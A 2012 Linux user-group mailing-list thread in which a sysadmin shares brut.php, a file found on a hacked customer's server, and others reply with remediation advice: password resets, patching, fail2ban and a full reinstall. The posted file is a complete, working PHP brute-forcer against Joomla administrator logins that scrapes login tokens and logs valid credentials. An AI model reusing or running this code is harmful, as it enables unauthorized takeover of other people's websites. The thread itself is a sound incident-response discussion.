[SLUG] Customer site hacked with brut.php - what to do?

[David Lyon]

I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):

How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?

--- brut.php (don't run this) ---

<body bgcolor="#808080">

<p align="center"><b><font size="5" color="#FFFFFF">#&nbsp; GaStRo
-Dz&nbsp;&nbsp; #</font></b></p>
<p align="center"><b><font color="#FFFFFF">Joomla Speed Brute
Force</font></b></p>
<form method="post" action="" enctype="multipart/form-data">
<p align="center"><b><font color="#FFFFFF">Username</font></b><font
color="#FFFFFF">:
<input type="text" name="usr" value='admin' size="28"> <b>Ex: Admin ;
administrator</b></font></p>
<p align="center"><font color="#FFFFFF">in , administrator , ..<br>
</font><b><font color="#FFFFFF">sites list:</font></b><font
color="#FFFFFF">
<input type="file" name="sites" size="34"></font></p>
<p align="center"><font color="#FFFFFF"><br>
</font><b><font color="#FFFFFF">Pass list</font></b><font color="#FFFFFF">
<input type="file" name="w0rds" size="35"></font></p>
<p align="center"><font color="#FFFFFF"><br>
<input type="submit" name="x" value="Start!">
</font></p>
</form>
<p align="center"><font color="#FFFFFF"><b><a href="http://Www.sec4ever.com
">
<font color="#FFFFFF">Www.sec4ever.com</font></a> <span
lang="ar-dz">|</span>
<a href="http://Www.gastro-dz.net"><font color="#FFFFFF">Www.gastro-dz.net
</font></a>
</b></font></p>
<p align="center"><b><font color="#FFFFFF">GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi - Al l
Dz Hackerz Team</font></b></p>
<p align="center">&nbsp;</p>

<?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro

if($_POST['x']){

echo "<hr>";

$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); //
Get Sites !

$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); //
Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class & Function'z

function txt_cln($value){ return str_replace(array("\n","\r"),"",$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this->post($site,$user,$pass))){

echo "<b># login successful : $user:$pass -> $site</b><BR>";
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}

}

public function post($site,$user,$pass){ // Post -> user & pass

$token = $this->extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for ->
function post

$source = $this->get_source($site);

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for -> function
extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?>
--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

[Mark Walkom]

On 22 August 2012 12:00, David Lyon <david.lyon...@gmail.com> wrote:

> I have a customer with a hacked website.
>
> When I ftp'd to their web-server I found this wart (listed below - saved as
> brut.php):
>
> How did the hacker put it on my system ? What could it have comprimised ?
> What
> can I do to stop further consequences?
>
>

Reset any management/admin passwords to be safe. Make sure everything
running on the server is up to date - OS, DB, Apache etc.

Get rid of FTP, use SCP and fail2ban.

[Robert Collins]

On Wed, Aug 22, 2012 at 2:54 PM, Mark Walkom <markw...@gmail.com> wrote:
> On 22 August 2012 12:00, David Lyon <david.lyon...@gmail.com> wrote:
>
>> I have a customer with a hacked website.
>>
>> When I ftp'd to their web-server I found this wart (listed below - saved as
>> brut.php):
>>
>> How did the hacker put it on my system ? What could it have comprimised ?
>> What
>> can I do to stop further consequences?
>>
>>
> Reset any management/admin passwords to be safe. Make sure everything
> running on the server is up to date - OS, DB, Apache etc.
>
> Get rid of FTP, use SCP and fail2ban.

Reinstall the machine from bare metal. Verify the BIOS against the
vendors version (not 100% fullproof) and discard the filesystem
entirely (take a backup first).

You don't know what has been altered, its not impossible they got
root, and its not impossible that they put a preboot attack in place
too.

-Rob

[David Lyon]

I have changed the password on the hosting account.

It won't be possible to reload everything else
because it is an ISP hosted machine.